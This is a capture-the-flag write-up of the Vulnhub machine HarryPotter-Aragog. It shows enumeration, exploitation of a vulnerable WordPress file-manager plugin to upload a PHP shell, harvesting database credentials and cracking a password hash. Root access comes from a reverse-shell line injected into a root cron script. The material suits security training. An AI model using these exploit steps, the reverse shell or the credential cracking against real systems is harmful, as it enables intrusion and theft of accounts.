Welcome to the HarryPotter-Aragog writeup from Vulnhub
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k

HarryPotter-Aragog

tags: Vulnhub Easy Linux
Platform: Vulnhub
Difficult: Easy
S.O.: Linux

Description

Aragog is the 1st VM of 3-box HarryPotter VM series in which you need to find 2 horcruxes hidden inside the machine (total 8 horcruxes hidden across 3 VMs of the HarryPotter Series) and ultimately defeat Voldemort.

Enumeration

Nmap

To get started, we run a quick open ports scan.

$ nmap -n -sS -T5 -p- 23.6.17.212
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 20:26 CEST
Nmap scan report for 23.6.17.212
Host is up (0.000049s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:AD:89:1C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.91 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 22,80 23.6.17.212
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 20:26 CEST
Nmap scan report for Aragog (23.6.17.212)
Host is up (0.00061s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
|   256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
|_  256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn´t have a title (text/html).
MAC Address: 08:00:27:AD:89:1C (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.61 ms Aragog (23.6.17.212)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.56 seconds

Ok, now we are going to run the vuln script from Nmap to see what results it shows us.

$ nmap -Pn -p 22,80 23.6.17.212 --script vuln
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 20:27 CEST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for Aragog (23.6.17.212)
Host is up (0.00036s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-csrf: Couldn´t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn´t find any DOM based XSS.
| http-enum: 
|   /blog/: Blog
|_  /blog/wp-login.php: Wordpress login page.
|_http-stored-xss: Couldn´t find any stored XSS vulnerabilities.
MAC Address: 08:00:27:AD:89:1C (Oracle VirtualBox virtual NIC)

Port 80

Now we know that there is a directory called blog that contains a Wordpress installation.

When we access the site we see that the styles are not loading. If we access the browser console we can see that it is trying to access the CSS and JS resources in the wordpress.aragog.hogwarts domain, so we are going to add it to our /etc/hosts file.

<script> loading failed with source "http://wordpress.aragog.hogwarts/blog/wp-includes/js/wp-embed.min.js?ver=5.0.12"

Nice, now in the first post we can see that they talk about removing plugins for security reasons so, we are going to list them.

Wpscan

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://wordpress.aragog.hogwarts/blog/wp-content/plugins/akismet/
 | Latest Version: 4.1.12
 | Last Updated: 2021-09-03T16:53:00.000Z
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://wordpress.aragog.hogwarts/blog/wp-content/plugins/akismet/, status: 500
 |
 | The version could not be determined.

[+] wp-file-manager
 | Location: http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/
 | Last Updated: 2021-07-21T04:53:00.000Z
 | Readme: http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/readme.txt
 | [!] The version is out of date, the latest version is 7.1.2
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/, status: 200
 |
 | Version: 6.0 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/readme.txt

Exploitation

Perfect, there is the wp-file-manager plugin which is out of date. Looking online, we can find an exploit searching a little on the internet.

Let's check if it is vulnerable.

$ ./rce.sh -u http://wordpress.aragog.hogwarts/blog/ --check

============================================================================================
wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]

By: Mansoor R (@time4ster)
============================================================================================

[+] Found wp-file-manager version: 6.0
[+] Version appears to be vulnerable
[+] Target: http://wordpress.aragog.hogwarts/blog/ is vulnerable

Brilliant! let's exploit it.

$ ./rce.sh -u http://wordpress.aragog.hogwarts/blog/ -f /var/www/html/shells/shell.php

============================================================================================
wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]

By: Mansoor R (@time4ster)
============================================================================================

[+] W00t! W00t! File uploaded successfully.
Location:  /blog/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php

Now we put a terminal to listen and access the uploaded file!
http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/lib/files/shell.php

$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [23.6.17.150] from (UNKNOWN) [23.6.17.212] 52410
Linux Aragog 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
 00:33:40 up 40 min,  0 users,  load average: 0.00, 0.48, 3.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (487): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Aragog:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Aragog:/$

Post exploitation

Privilege escalation: www-data to hagrid98

Enumeration

Linpeas

We are going to run Linpeas to see what useful information we find.

╔══════════╣ Searching passwords in config PHP files
define('DB_PASSWORD', 'mySecr3tPass');
define('DB_USER', 'root');
    $pwd = trim( wp_unslash( $_POST[ 'pwd' ] ) );
    define('DB_PASSWORD', $pwd);
    define('DB_USER', $uname);
define('DB_PASSWORD', 'password_here');
define('DB_USER', 'username_here');
    define('DB_USER', 'wordpress');

Great, we have the credentials for the database. We are going to connect to it and list the Wordpress users.

MySQL

www-data@Aragog:/tmp$ mysql -u root -p
[...]
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.100 sec)
[...]
MariaDB [wordpress]> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
| wp_wpfm_backup        |
+-----------------------+
13 rows in set (0.001 sec)

MariaDB [wordpress]> select * from wp_users;
+----+------------+------------------------------------+---------------+--------------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email               | user_url | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+--------------------------+----------+---------------------+---------------------+-------------+--------------+
|  1 | hagrid98   | $P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc. | wp-admin      | hagrid98@localhost.local |          | 2021-03-31 14:21:02 |                     |           0 | WP-Admin     |
+----+------------+------------------------------------+---------------+--------------------------+----------+---------------------+---------------------+-------------+--------------+
1 row in set (0.001 sec)

MariaDB [wordpress]>

Hashcat

Now that we have the hash of hagrid98 let's try to break it with Hashcat.

$ hashcat -m 400 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.0.0) starting...
[...]
$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.:password123   
[...]
Started: Thu Sep  9 21:39:24 2021
Stopped: Thu Sep  9 21:39:27 2021
$ ssh hagrid98@wordpress.aragog.hogwarts
The authenticity of host 'wordpress.aragog.hogwarts (23.6.17.212)' can´t be established.
ECDSA key fingerprint is SHA256:Xy+Xj3BR8BLS4rk/l2jfAZmSh0d3m5zJXaB5QsUT3AA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'wordpress.aragog.hogwarts,23.6.17.212' (ECDSA) to the list of known hosts.
hagrid98@wordpress.aragog.hogwarts´s password: 
Linux Aragog 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
hagrid98@Aragog:~$ id
uid=1000(hagrid98) gid=1000(hagrid98) groups=1000(hagrid98)
hagrid98@Aragog:~$ ls
horcrux1.txt
hagrid98@Aragog:~$ cat horcrux1.txt
horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}

We already have the first horcrux:

horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}
1: RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets

Privilege escalation: hagrid98 to root

Enumeration

Pspy

As we can see, the ASD file runs with root permissions automatically every minute or so.

hagrid98@Aragog:~$ ./pspy64
[...]
2021/09/10 01:52:01 CMD: UID=0    PID=28512  | /bin/sh -c bash -c "/opt/.backup.sh"

And it contains the following lines.

#!/bin/bash

cp -r /usr/share/wordpress/wp-content/uploads/ /tmp/tmp_wp_uploads

Exploitation

All we need is to inject a reverse shell into the script and put a terminal listening.

#!/bin/bash

sh -i >& /dev/tcp/23.6.17.150/8787 0>&1

cp -r /usr/share/wordpress/wp-content/uploads/ /tmp/tmp_wp_uploads
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [23.6.17.150] from (UNKNOWN) [23.6.17.212] 52420
sh: 0: can´t access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
#

And now that we are root we can get the second horcrux.

# ls
horcrux2.txt
# cat horcrux2.txt
  ____                            _         _       _   _                 
 / ___|___  _ __   __ _ _ __ __ _| |_ _   _| | __ _| |_(_) ___  _ __  ___ 
| |   / _ \| `_ \ / _` | `__/ _` | __| | | | |/ _` | __| |/ _ \| `_ \/ __|
| |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
 \____\___/|_| |_|\__, |_|  \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
                  |___/                                                   

Machine Author: Mansoor R (@time4ster)
Machine Difficulty: Easy
Machine Name: Aragog 
Horcruxes Hidden in this VM: 2 horcruxes

You have successfully pwned Aragog machine.
Here is your second hocrux: horcrux_{MjogbWFSdm9MbyBHYVVudCdzIHJpTmcgZGVTdHJPeWVkIGJZIERVbWJsZWRPcmU=}

# For any queries/suggestions feel free to ping me at email: time4ster@protonmail.com

#

And we already have the second horcrux:

horcrux_{MjogbWFSdm9MbyBHYVVudCdzIHJpTmcgZGVTdHJPeWVkIGJZIERVbWJsZWRPcmU=}
2: maRvoLo GaUnt's riNg deStrOyed bY DUmbledOre